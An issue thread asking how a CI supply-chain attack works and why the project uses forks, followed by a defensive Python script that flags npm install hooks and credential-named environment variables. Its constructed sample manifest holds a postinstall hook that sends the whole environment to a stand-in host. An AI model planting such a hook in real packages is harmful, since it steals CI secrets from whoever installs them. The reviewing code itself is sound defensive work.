Describe how the supply-chain attack could work

In your process document, you describe the reason why you use forks:

We are using forks of projects in order to avoid security issues where a malicious dependency could upload secrets during our CI pipelines.

This is supposed to mimic community contributions and reviewers / maintainers should proceed with similar caution to these updates in order to prevent supply chain attacks.

I'm trying to understand what the attack is that you are describing here, but it's a bit unclear. Could you provide a bit more detail about what the potential attack is here, perhaps with an example? It would also be useful to describe how exactly the fork method you are using to bypass this actually does bypass the potential attack, and what it is about renovate and forks that cannot be done with upstream's renovate.

Edited by Micah
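The attack class the quoted process document refers to (a dependency that reads CI secrets while being installed) is the kind of thing a reviewer of a dependency-bump merge request would want to check for. The following is an added illustration, not code from this project or from renovate: it parses a constructed npm package.json for lifecycle hooks that run automatically during install, and lists which CI environment variables such a hook could read. The package name "evil-leftpad", the hook command and the environment values are all made up for the example.

```python
import json
import re

# Constructed manifest for a hypothetical dependency (not a real package).
# npm runs the lifecycle hooks below automatically on `npm install`, in the
# installing process's environment, so CI secrets exported as env vars are
# readable by whatever command the hook contains.
SAMPLE_MANIFEST = json.dumps({
    "name": "evil-leftpad",
    "version": "1.0.1",
    "scripts": {
        "postinstall": "node -e \"require('https').request({host:'example.invalid',"
                       "method:'POST'}).end(JSON.stringify(process.env))\"",
        "test": "jest",
    },
})

# Constructed CI environment, as a job running `npm install` might see it.
SAMPLE_ENV = {
    "CI": "true",
    "HOME": "/builds/runner",
    "NPM_TOKEN": "npm_xxxxxxxx",            # made-up value
    "AWS_SECRET_ACCESS_KEY": "wJalrXUtn",    # made-up value
    "PATH": "/usr/bin:/bin",
}

# Hooks npm runs around installation of a package (see npm's "scripts" docs).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Variable names that usually carry credentials; tune to your CI's naming.
SECRET_NAME_RE = re.compile(r"TOKEN|SECRET|PASSWORD|PASSWD|KEY|CREDENTIAL", re.I)


def install_hooks(manifest_json: str) -> dict:
    """Return the scripts in a package.json that npm executes during install."""
    scripts = json.loads(manifest_json).get("scripts", {})
    return {name: cmd for name, cmd in scripts.items() if name in INSTALL_HOOKS}


def secret_like_env(env: dict) -> dict:
    """Return the env entries a hook could read whose names look like credentials."""
    return {k: v for k, v in env.items() if SECRET_NAME_RE.search(k)}


def review_update(manifest_json: str, env: dict) -> list:
    """Findings a reviewer would want before merging a dependency bump."""
    findings = []
    hooks = install_hooks(manifest_json)
    exposed = secret_like_env(env)
    for name, cmd in hooks.items():
        findings.append(f"{name} hook runs on install: {cmd[:60]}")
    if hooks and exposed:
        findings.append("env vars reachable by hooks: " + ", ".join(sorted(exposed)))
    return findings


if __name__ == "__main__":
    for line in review_update(SAMPLE_MANIFEST, SAMPLE_ENV):
        print(line)
```

The check is deliberately simple: the point is that a new version of a dependency can gain an install hook that the previous version did not have, and that hook runs with whatever secrets the CI job exports. Running installs with `npm ci --ignore-scripts` in pipelines that hold secrets, or keeping secrets out of the dependency-install job entirely, removes the channel regardless of where the update comes from.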